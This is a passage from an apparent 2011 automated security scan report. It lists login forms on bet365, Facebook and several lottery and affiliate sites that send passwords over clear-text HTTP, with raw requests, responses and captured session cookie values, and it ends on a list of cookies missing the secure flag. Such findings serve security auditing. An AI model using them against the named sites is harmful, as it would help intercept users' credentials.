ssword", 2);" OnFocus="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" OnBlur="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 1);" />

<a onclick="if (CreateLoginProcess('', '%2fhome%2fen%2f', '', false, this.id)) { SetHiddenPassword("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword"); return true;} else
...[SNIP]...

6.8. http://games.bet365.com/home/en/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://games.bet365.com
Path:	/home/en/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://games.bet365.com/home/en/Default.aspx

The form contains the following password field:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /home/en/ HTTP/1.1
Host: games.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:20 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jqaokq45oa00yd45k1sqtdbv; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=7FFFF94400DA44DBABA668D6BF938444000002; path=/
Set-Cookie: session=stk=7FFFF94400DA44DBABA668D6BF938444000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:02:19 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:02:19 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:02:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 338090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/home/en/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword", 2);" OnFocus="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" OnBlur="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 1);" />

<a onclick="if (CreateLoginProcess('', '%2fhome%2fen%2f', '', false, this.id)) { SetHiddenPassword("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword"); return true;} else
...[SNIP]...

6.9. http://poker.bet365.com/home/en/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://poker.bet365.com
Path:	/home/en/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://poker.bet365.com/home/en/Default.aspx

The form contains the following password field:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /home/en/ HTTP/1.1
Host: poker.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:32 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nyfxkkm5jpltjay123ux5555; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=21BAFE3BE630423EA6F6F56A8ADE1FFB000002; path=/
Set-Cookie: session=stk=21BAFE3BE630423EA6F6F56A8ADE1FFB000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:20:32 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:20:32 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:20:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 102583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/home/en/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword", 2);" OnFocus="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" OnBlur="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 1);" />

<a onclick="if (CreateLoginProcess('', '%2fhome%2fen%2f', '', false, this.id)) { SetHiddenPassword("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword"); return true;} else
...[SNIP]...

6.10. http://www.bet365.com/extra/en/betting/in-play previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/betting/in-play

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bet365.com/extra/en/betting/in-play/Default.aspx

The form contains the following password field:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/betting/in-play HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:22 GMT
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:22 GMT; path=/
Set-Cookie: ASP.NET_SessionId=unylycjqefpfxs45dlzrct45; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:22 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:22 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:22 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 102612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/betting/in-play/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword", 2);" OnFocus="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 1);" /></div>
...[SNIP]...

6.11. http://www.bet365.com/extra/en/betting/live-streaming previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/betting/live-streaming

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bet365.com/extra/en/betting/live-streaming/Default.aspx

The form contains the following password field:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/betting/live-streaming HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:24 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:23 GMT; path=/
Set-Cookie: ASP.NET_SessionId=arbxtv45ukmqrsq55mwos0iy; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:23 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:23 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 101179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/betting/live-streaming/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword", 2);" OnFocus="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 1);" /></div>
...[SNIP]...

6.12. http://www.bet365.com/extra/en/mobile/introduction/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/mobile/introduction/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bet365.com/extra/en/mobile/introduction/Default.aspx

The form contains the following password field:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/mobile/introduction/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:25 GMT
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=3ysuis55m3k5e4u42bup5i55; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 65383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/mobile/introduction/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword", 2);" OnFocus="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 1);" /></div>
...[SNIP]...

6.13. http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/promotions/horse-racing/best-odds-guaranteed

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed/Default.aspx

The form contains the following password field:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/promotions/horse-racing/best-odds-guaranteed HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:26 GMT
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=5fxxsc45xzcdzr55sixclp45; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 115152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/promotions/horse-racing/best-odds-guaranteed/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword", 2);" OnFocus="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 1);" /></div>
...[SNIP]...

6.14. http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/promotions/soccer/bore-draw-money-back

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back/Default.aspx

The form contains the following password field:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/promotions/soccer/bore-draw-money-back HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:24 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:24 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fufizjajowzlfy45sho150nb; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:24 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:24 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 98594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/promotions/soccer/bore-draw-money-back/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword", 2);" OnFocus="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 1);" /></div>
...[SNIP]...

6.15. http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/extra/en/promotions/soccer/soccer-accumulator-bonus

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus/Default.aspx

The form contains the following password field:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/promotions/soccer/soccer-accumulator-bonus HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:25 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=tv4wgmvkxivljf55azj5ogae; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 113999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/promotions/soccer/soccer-accumulator-bonus/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword", 2);" OnFocus="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 1);" /></div>
...[SNIP]...

6.16. http://www.crazyrewards.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.crazyrewards.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://partners.crazyrewards.com/login.asp

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.crazyrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 15 Mar 2011 14:28:31 GMT
Accept-Ranges: bytes
ETag: "c0c41421de3cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:20:05 GMT
Connection: close
Content-Length: 11218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="robots" con
...[SNIP]...
<div id="loginbox">
       <form method="post" action="http://partners.crazyrewards.com/login.asp" id="form1" name="form1" target="_blank">
       <table border="0" width="266" >
...[SNIP]...
<input class="input-login" type="text" name="username" value="username" onfocus="if(this.value=='username')this.value='';"/>
   <input class="input-login" type="password" name="password" value="password" onfocus="if(this.value=='password')this.value='';"/>
</td>
...[SNIP]...

6.17. http://www.facebook.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.facebook.com/

The form contains the following password field:

reg_passwd__

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTfED2OUFMXxmZkOCiFGO; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=szS-2; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.116.65
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){return false;}.call(this,event)!==false && Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="0c8389686ea405c1f0d6cb61733a30bf" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

6.18. http://www.heavenaffiliates.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.heavenaffiliates.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://affiliates.heavenaffiliates.com/login_cust.asp

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.heavenaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:32 GMT
Server: Apache FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.heavenaffiliates.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title> He
...[SNIP]...
</h2>
                       <form action="http://affiliates.heavenaffiliates.com/login_cust.asp" method="post">
                           <fieldset>
...[SNIP]...
</label>
                                   <input type="password" name="password" class="input" />
                               </p>
...[SNIP]...

6.19. http://www.postcodelottery.com/MyAccount.htm previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/MyAccount.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.postcodelottery.com/web/form

The form contains the following password field:

f90908

Request

GET /MyAccount.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:36 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:36 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 16408

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="short
...[SNIP]...
</script>
           <form action="/web/form" name="f91519f" id="f91519f" method="post" enctype="multipart/form-data"><fieldset style="display:none" >
...[SNIP]...
</label>
                       <input type="password" class="text " id="password" name="f90908" size="20" maxlength="250" value="" />

               </div>
...[SNIP]...

6.20. http://www.tstglobal.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tstglobal.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://members.tstglobal.com/login.php

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.tstglobal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 16 May 2011 12:32:05 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-EN" lang="en-EN">

<head>
   <title
...[SNIP]...
</h2>
<form action="http://members.tstglobal.com/login.php" method="post">
       <input type="hidden" name="Submit" value="1">
...[SNIP]...
</label>
<input type="password" name="login-password" id="login-password" value="" />

<input type="image" src="/assets/images/interface/button-login.gif" id="login-submit" alt="Login" />
...[SNIP]...

7. SSL cookie without secure flag set previous next
There are 24 instances of this issue:

https://bingo.betsson.com/en/
https://help.betsson.com/display/4/kb/faq/index.aspx
https://members.bet365.com/members/chat/
https://poker.betsson.com/en/
https://scratch.betsson.com/en/
https://secure.neogames-tech.com/ScratchCards/Lobby.aspx
https://www.betsson.com/en/about/
https://www.betsson.com/en/about/company-information/payments-and-security/index.asp
https://www.betsson.com/en/customer-service/
https://www.betsson.com/en/customer-service/forgotten-password/
https://www.betsson.com/en/customer-service/privacy-statement/
https://www.betsson.com/en/customer-service/responsible-gaming/
